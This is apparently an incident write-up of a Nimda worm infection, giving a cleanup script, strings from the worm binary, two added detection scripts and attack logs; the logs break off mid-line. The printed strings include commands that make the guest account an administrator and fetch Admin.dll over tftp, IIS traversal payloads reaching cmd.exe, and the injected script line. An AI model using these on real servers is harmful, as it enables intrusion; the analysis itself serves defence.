December 22, 2004

When Things suddenly went wrong: w32.nimda.a@mm - Exhibits

Exhibits related to the Nimda attack at www.iimcal.ac.in


Exhibit A - CleanScript.pl (The script that removes the injected script line from every file in the infected file hierarchy.)


#!/usr/bin/perl
use strict;
use warnings;

# Change this to the starting point of your
# directory dump
my $dir = "/home/n_ravikiran/Website";

my $filecount = 0;

listdirectory($dir);

# Walk the tree recursively and hand every regular file to processnames().
sub listdirectory
{
    my ($dir) = @_;

    opendir(my $dh, $dir) or return;
    # Skip "." and ".." by name; readdir does not guarantee their position.
    my @entries = grep { $_ ne '.' && $_ ne '..' } readdir($dh);
    closedir($dh);

    foreach my $entry (@entries)
    {
        my $path = "$dir/$entry";
        next if -l $path;    # do not follow symlinks out of the tree
        if (-d $path)
        {
            listdirectory($path);
        }
        elsif (-f $path)
        {
            processnames($path);
        }
    }
}

# Rewrite one file without the lines that reference readme.eml.
sub processnames
{
    my ($file) = @_;
    $filecount++;

    # Read first; if that fails, leave the file alone instead of truncating it.
    open(my $in, '<', $file) or do { warn "cannot read $file: $!\n"; return; };
    my @totalFile = <$in>;
    close($in);

    open(my $out, '>', $file) or do { warn "cannot write $file: $!\n"; return; };
    foreach my $line (@totalFile)
    {
        if ($line =~ /readme\.eml/)
        {
            print $line;    # show the line that is being dropped
        }
        else
        {
            print $out $line;
        }
    }
    close($out);

    print "$filecount $file\n";
}


Exhibit B - Interesting Strings


a) Some Registry Entries.


System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China


b) The header of the mail file. Note that the content type
is declared as a wave file ;) which is the neat trick used to
deliver an executable file. The file, however, is called readme.exe.


MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====
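
The mismatch pointed out in b), an attachment named readme.exe declared as audio/x-wav and pulled in by a zero-size iframe through its Content-ID, can be checked mechanically on stored or incoming mail. This is an added example, not part of the original exhibits; the function audit, the extension list and the sample message (modelled on the header above, with a harmless placeholder payload) are assumptions made for illustration.

```python
import email
import re
from email import policy

EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".bat")
CID_REF = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?cid:([^\s"\'>]+)', re.I)

def audit(raw):
    """Return findings for one raw message given as bytes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    named, framed, findings = {}, set(), []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()  # falls back to Content-Type name=
        if ctype == "text/html":
            framed.update(CID_REF.findall(part.get_content()))
        if name.endswith(EXECUTABLE_EXT):
            named[str(part["Content-ID"] or "").strip("<> ")] = name
            if not ctype.startswith("application/"):
                findings.append(f"type-mismatch: {name} declared as {ctype}")
    for cid in sorted(framed.intersection(named)):
        findings.append(f"auto-load: iframe references cid:{cid} ({named[cid]})")
    return findings

# Constructed message modelled on the header in b); the payload is a placeholder.
SAMPLE = b"""\
Content-Type: multipart/related; boundary="====_ABC1234567890DEF_===="

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

cGxhY2Vob2xkZXI=
--====_ABC1234567890DEF_====--
"""
```

Calling audit(SAMPLE) reports both the type mismatch and the iframe that loads the attachment by Content-ID.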

c) Some more beautiful ideas: the hiding mechanism of
the virus in case cleaning is done from the DOS prompt or
otherwise, causing the setup to 'update' the machine with
the virus at boot time.

NUL=
[rename]
\wininit.ini

d) Payload attack method. Notice the enabling of sharing,
then the Administrator access given to guests, and the hiding
of file extensions. (The reason for this is wonderful: readme.exe
comes with an icon that looks like that of HTML files
of IE, with the symbol 'e'. If extensions were displayed, this
method of inducing users to execute the file would fail.)

Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld
%ld %ld

e) On NT, hiding and maybe a timebomb? Note the counter...

ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib

f) NT again. Attack on IIS this way.

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
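
The probe list in f) hides the same traversal step behind double percent-encoding (%255c, %%35c, %25%35%63, %252f) and behind two-byte sequences (%c0%af, %c1%9c, %c1%1c, %c0%2f). This is an added example, not part of the original exhibits, that undoes both before looking for traversal in access-log lines; the function names, the lenient two-byte fold and the sample lines (documentation address range) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
FOLD = re.compile(rb"[\xc0\xc1].", re.S)   # two-byte forms that can only encode ASCII
SHELLS = {"cmd.exe", "root.exe"}           # binaries named in the probe list

def _fold(m):
    # Lenient decode: keep the low bits of both bytes, as a permissive decoder would.
    return bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)])

def canonicalize(target, max_rounds=4):
    """Decode the path until it stops changing; return (path, passes_that_changed_it)."""
    data = target.split("?", 1)[0].encode("latin-1", "replace")
    rounds = 0
    for _ in range(max_rounds):
        decoded = FOLD.sub(_fold, unquote_to_bytes(data))
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data.replace(b"\\", b"/").decode("latin-1").lower(), rounds

def classify(target):
    path, rounds = canonicalize(target)
    reasons = []
    if ".." in path.split("/"):
        reasons.append("traversal")
    if rounds > 1:
        reasons.append("multi-encoded")
    if path.rsplit("/", 1)[-1] in SHELLS:
        reasons.append("shell-binary")
    return reasons

def scan(lines):
    """Return (client, status, reasons) for every log line with at least one reason."""
    hits = []
    for line in lines:
        m = LOG.match(line)
        if m and (reasons := classify(m.group(2))):
            hits.append((m.group(1), int(m.group(3)), reasons))
    return hits

# Constructed sample lines in Apache combined format (documentation address range).
SAMPLE = [
    '192.0.2.10 - - [21/Sep/2001:16:38:29 +0530] "GET /index.html HTTP/1.0" 200 512 "-" "-"',
    '192.0.2.10 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314 "-" "-"',
    '192.0.2.10 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"',
    '192.0.2.10 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297 "-" "-"',
]
```

scan(SAMPLE) flags the three probe lines and leaves the ordinary request alone; the status code is kept in each hit so that a 200 answer to such a request stands out from the 404 and 400 answers a non-IIS server gives.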

g) The added string for delivery of payload. This started it all.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close

h) Unknown agenda of the payload. WinZip is not infected,
says Symantec. Also listed: the DLL that is infected and that
prevents Word (or any editor that uses it) from working properly,
and the string that goes into the system.ini file.

readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
dontrunold

i) Some references that show the work that the payload does on the user side.

gethostbyname
gethostname
sendto
send
recvfrom
recv

MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL

Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet

j) Some more Registry Entries

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT


Exhibit C - Nimda Attack Sequence

The following lines are the logs of the attack on the Linux machine by a particular IIS server. Although our IIS server fell to the first of these attacks, the Linux server has been braving the blizzard all along. Okay, the worm cannot hit it, yet the feeling of safety is great. Initially this was restricted to 203. addresses, but now we are having attacks from all sorts of IP ranges. Another thing to note is that the attacks have become particularly nasty on this machine, while the patched IIS server was subsequently left alone. It seems as if the one chosen for attack is not entirely random.

203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 347 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%252